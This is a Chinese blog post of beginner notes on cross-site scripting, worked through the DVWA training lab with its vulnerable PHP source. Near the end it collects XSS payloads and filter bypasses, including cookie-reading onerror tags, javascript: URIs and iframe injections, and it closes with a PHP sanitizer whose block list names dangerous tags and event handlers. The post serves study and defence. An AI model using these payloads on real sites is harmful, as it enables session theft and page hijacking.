xss初试

最新推荐文章于 2025-04-26 18:31:47 发布
最新推荐文章于 2025-04-26 18:31:47 发布
阅读量404 收藏
点赞数
分类专栏: 漏洞 文章标签: javascript xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51911432/article/details/113361748
版权

目录

xss

反射型 js处理返回后端后又反馈回前端
存储型 储存到某一介质中
DOM型 直接有js解析后反馈给前端

xss漏洞的修复办法

HTML实体编码
使用白名单过滤掉用户输入的恶意字符
根据业务场景对症下药
对关键的cookie使用http-only

存储型xss

攻击者在页面上插入XSS代码,服务端将数据存入数据库,当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果。

漏洞挖掘

存在输入点就可能存在xss
存在输入点并保存在后端且可以查看
<img scr=1 οnerrοr=alert(document.cookie)>获取cookie

漏洞修复

php : 添加strip_tag函数 剥去字符串中的 HTML 标签:可防止html注入
暴力方法,在文本框中可能需要HTML的操作例如<b> <h1>需要加粗或其他就不适用了
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
stripslashes() 函数 删除反斜杠

DVWA 例子

low

直接script
看看php
首先trim函数去空格只去除头尾
然后stripslashes删除反斜杠 isert 和is_object 判断变量是否存在和是否为对象
mysqli_real_escape_string 转义 SQL 语句中使用的字符串中的特殊字符
trigger_error对字长限制
mysqli_query() 函数执行某个针对数据库的查询
mysqli_error() 函数返回最近调用函数的最后一个错误描述。

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

medium

php
首先两个trim去空格
然后strip_tag剥离HTML标签
mysqli_real_escape_string转义SQL
trigger_error限字数
难道就没有办法了吗,不是还有name吗,直接修改maxlength=100 这样子就够写了
依旧是简单的script


<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

HIGH

修改name长度简简单单img加onerror
加了个preg_replace函数可以写正则表达式


<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

impossible

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

反射型xss

攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。

漏洞挖掘

URL传参数
atuofocus οnfοcus=alert(1)
javascript:alert(1)

修复

过滤 & (和号)&amp " (双引号)&quot’ (单引号)< (小于)&lt> (大于)&gt
htmlspecialchars 把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体
如需把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数,可能会被利用

DVWA 例子

low

很简单直接script就可以,看看php
将get的name直接输出

<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>

medium

依然很简单,script输入发现alert(1)输出了,所以应该是script被过滤了所以用img 加onerror就可以了
看看php
str_replace() 函数替换字符script为空,因为这个函数区分大小写所以可以用大写绕过,
还可以用双显绕过

<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

HIGH

还是输入script试试结果只输出> 又试了试< 发现可以输出,难道又是script屏蔽
还是老套路img 加onerror
看看php
真的是script屏蔽只是更加严格不能用大写绕过也不能用双写绕过
preg_replace 函数执行一个正则表达式的搜索和替换。

<?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>
正则表达式

#一个’.‘就是匹配\n(换行符)以外的任何字符
‘a.b’ eg :acb
#一个’*‘前面的字符出现0次或以上
‘a*b’ eg:acdb
#贪婪,匹配从.*前面为开始到后面为结束的所有内容。
‘a.*b’
#非贪婪,遇到开始和结束就截取,因此截取多次符合的结果,中间没有字符也会被截取 ???
‘a.*?b’
#非贪婪,与上面是一样的,只是与上面相比,多了一个括号,只保留括号中的内容
‘a(.*?)b’
//不要在意出现这么奇怪的内容,这是python的正则表达式 import re
#re.S不会对\n进行中断
print(re.findall(r’a(.*?)b’,str,re.S))
#保留a,b中间的内容
print(re.findall(r’a(.+?)b’,str))
print(re.findall(r’a(.+?)b’,str)[0])

Impossible

htmlspecialchars()函数转化为HTML实体编码
话说这个难度为什么是默认选项


<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

DOMxss

攻击者在URL中插入XSS代码,前端页面直接从URL中获取XSS代码并且输出到页面,导致XSS代码的执行,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
感觉和其他的没什么区别
注意观察HTML存在的注入点

修复

text

DVWA eg

low

script直接搞定
看php
什么都没有

<?php
# No protections, anything goes
?>

medium

看HTML发现注入点在select里面的option中所以将option和select标签全部屏蔽加入alert就好了
</option></select><img src=# οnerrοr=alert(1)>
看php
array_key_exists() 函数检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。
stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)。还是对script管控

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

HIGH

tip:URL中#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互
所以直接#<script>alert(1)</script>
看php
这里使用了白名单过滤

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?>

impossible

没有php但是用了URL编码对 < 和>进行限制
下面是w3schoolURL编码的网站

https://www.w3school.com.cn/tags/html_ref_urlencode.html

攻击语句

<script>location=“https://www.baidu.com”</script> //页面跳转
<iframe src= httpss:www.baidu.com width=400 height=300></iframe> //嵌入页面
<iframe src= httpss:www.baidu.com width=0 height=0 frameborder></iframe>
<img scr=1 οnerrοr=alert(document.cookie)>获取cookie

绕过

<img scr=1 οnerrοr=alert(document.cookie)>
双显绕过
<scr<script>ipt>alert(1)</scr</script>ipt>
大小写绕过(php不区分大小写)
<ScRiPt>alert(1)</ScRiPt>
突破alert
<script>confirm(‘hack’)</script>
<img src=1 οnerrοr=confirm(‘1’)>

"><iframe src=javascript:alert(1)>
"><a href=javascript:alert(1)>
"> <a href=“javascript:alert(1)”>123</a>
"> <a href=“javascript:%61lert(1)”>123</a> //
tip:URL中#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互
绕过尖括弧 通过u003c和u003e来代
u003cimg src=1 οnerrοr=alert(/xss/)u003e
’ οnmοuseοver= alert(1)
" οnclick=alert(1)

JavaScript等过滤字符的绕过

HTML字符实体转换
javascript:alert(1)
javascript:alert1
javascript:alert1

隐藏的输入框:

hidden
keyword = test&t_sort="type=“text” οnmοuseοver="alert(1)

http头部的xss注入

burp抓包,改Referer头

php修复函数

strip_tag函数 剥去字符串中的 HTML 标签:可防止html注入
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
stripslashes() 函数 删除反斜杠
trim函数去空格只去除头尾
str_replace() 函数替换字符
preg_replace 函数执行一个正则表达式的搜索和替换。
htmlspecialchars() 函数转化为HTML实体编码
array_key_exists() 函数检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。使用白名单过滤
stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)

remove_xss 这个之后再研究

https://www.jb51.net/article/70238.htm

function remove_xss($val) {
  // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
  // this prevents some character re-spacing such as <java\0script>
  // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
  $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);
  // straight replacements, the user should never need these since they're normal characters
  // this prevents like <IMG SRC=@avascript:alert('XSS')>
  $search = 'abcdefghijklmnopqrstuvwxyz';
  $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
  $search .= '1234567890!@#$%^&*()';
  $search .= '~`";:?+/={}[]-_|\'\\';
  for ($i = 0; $i < strlen($search); $i++) {
   // ;? matches the ;, which is optional
   // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
   // @ @ search for the hex values
   $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
   // @ @ 0{0,7} matches '0' zero to seven times
   $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
  }
  // now the only remaining whitespace attacks are \t, \n, and \r
  $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
  $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
  $ra = array_merge($ra1, $ra2);
  $found = true; // keep replacing as long as the previous round replaced something
  while ($found == true) {
   $val_before = $val;
   for ($i = 0; $i < sizeof($ra); $i++) {
     $pattern = '/';
     for ($j = 0; $j < strlen($ra[$i]); $j++) {
      if ($j > 0) {
        $pattern .= '(';
        $pattern .= '(&#[xX]0{0,8}([9ab]);)';
        $pattern .= '|';
        $pattern .= '|(�{0,8}([9|10|13]);)';
        $pattern .= ')*';
      }
      $pattern .= $ra[$i][$j];
     }
     $pattern .= '/i';
     $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
     $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
     if ($val_before == $val) {
      // no replacements were made, so exit the loop
      $found = false;
     }
   }
  }
  return $val;
}

$ra1 对HTML标签做限制
$ra2 对js事件做限制
排查风险
array_merge() 函数把一个或多个数组合并为一个数组。

XSS漏洞
2401_83181186的博客
04-25 1163
XSS漏洞介绍以及beef,waf简介
应届生计算机工程师岗位初试
qq_41265757的博客
04-08 1867
题目由选择题、填空题、简答题组成 选择题: 1.结合速率与容错,做RAID5,最少需要()块硬盘 2.把网络 202.112.78.0划分为多个子网(子网掩码:255.255.255.192),则各个子网种主机地址总数是() 3.区块链的特征不包括() 4.在Linux中,DNS配置文件是(),它包含了主机的域名搜索顺序和DNS服务器的地址 5.用户反馈web速度慢,发现是由游戏等应用,为了保证正常运行,可以部署()来解决 6.SQL中,子查询是() 7.引起广播风暴的是() 8.支持电子邮件发送的应用层协
XSS学习
m0_50830480的博客
09-03 298
XSS漏洞 一、XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. 二、xss 分类:
HTML与安全性:XSS、防御与最佳实践
最新发布
欢迎来到我的博客,希望你能有所收获
04-26 1461
XSS、防御与最佳实践
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
xray使用初试-扫描登录后的APP
u011975363的专栏
05-06 4627
平时用的扫描器一般是AWVS,appscan等,属于主动扫描,但对于登录后的各种功能都不方便扫描,今天经同事指导,认识了xray扫描器,利用该扫描器配置代理对登录后的app进行了扫描,效果还不错,因此记录下来与大家分享。
面试经历---YY欢聚时代(2015年11月21日上午初试、25日下午复试)
brushli的专栏
01-10 2万+
YY欢聚时代一年多前去面试过一次,当时鄙视了,在现在的公司呆了1年半了,感觉做得很不爽,而且薪资又不满意,所以想找个新工作,就想去YY面试。 下面将两次YY面试的经历写出来,包括一次初试和一次复试的面试题目。 一、2015年11月21日上午初试的面试题如下: 1.做一下自我介绍 画出正在做的B2B平台的架构图,包括各子系统(ec,buyer,seller,message,orde
jsp 聊天室初次尝试
11-01
1. 安全性:密码明文传输、SQL注入、XSS攻击等安全风险。 2. 性能:大量用户同时在线可能导致服务器压力增大,需要考虑负载均衡和缓存策略。 3. 实时性:消息的实时推送可能不够稳定,需要优化通信机制。 4. 用户...
一个菜鸡的2021奇安信校招笔试总结及第一轮技术面面经
Dreeee的博客
08-22 1万+
谨以此文记录我人生中第一次面试。
XSS漏洞总结之小试牛刀
MX的博客
06-20 1万+
一:XSS漏洞总结 1&amp;amp;amp;gt;:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2&amp;amp;amp;gt;: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
XSS漏洞(一)
不秃头的程序Yang
05-15 663
一、漏洞介绍 XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击 缩写为 XSSXSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面, 供给其它用户访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。 二、攻击危害 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的
网络安全—XSS漏洞
kuaindl的博客
09-29 862
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是攻击者往Web页面或者URL里插入恶意JavaScript脚本代码,如果Web应用程序对于用户输入的内容没有过滤,那么当正常用户浏览该网页的时候,嵌入在Web页面里的恶意JavaScript脚本代码会被执行,从而达到恶意攻击正常用户的目的。 一、XSS漏洞出现的两个条件 1、可能控制的输入点 2、输入能返回到前端页面上被浏览器当成脚本语言解释执行 二、XSS危害 cookie窃取 会话劫取 键盘记录 客户端信息探查 网页.
Web的基本漏洞--XSS漏洞
尽欢
05-31 4190
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
【web安全】——XSS漏洞
wxh的博客
10-02 1928
DOM被称为文档对象模型,是一个平台和语言的接口,使得程序和脚本可以动态访问和更新文档的内容、结构和样式。DOM本身是一个表达XML文档的标准,HTML文档从浏览器的角度来说就是XML文档,有了这些技术之后,就可以通过js轻松访问到他们。DOM会将XML文件的节点构建成树状结构,以此反应XML文件本身的阶层结构。
XSS 漏洞简单介绍
2401_84275261的博客
04-15 1839
XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,它允许攻击者在网页上注入恶意脚本代码。最早被发现的XSS漏洞是在1996年,随着JavaScript的出现,XSS漏洞因为可以使用JavaScript进行攻击而变得更加普遍和危险。2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。8、窃取 cookie 的 sessionid,冒充登录。1、盗取各类用户账号,如机器登录帐号、用户网银帐号、各类管理员帐号。3、盗窃企业重要的具有商业价值的资料。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值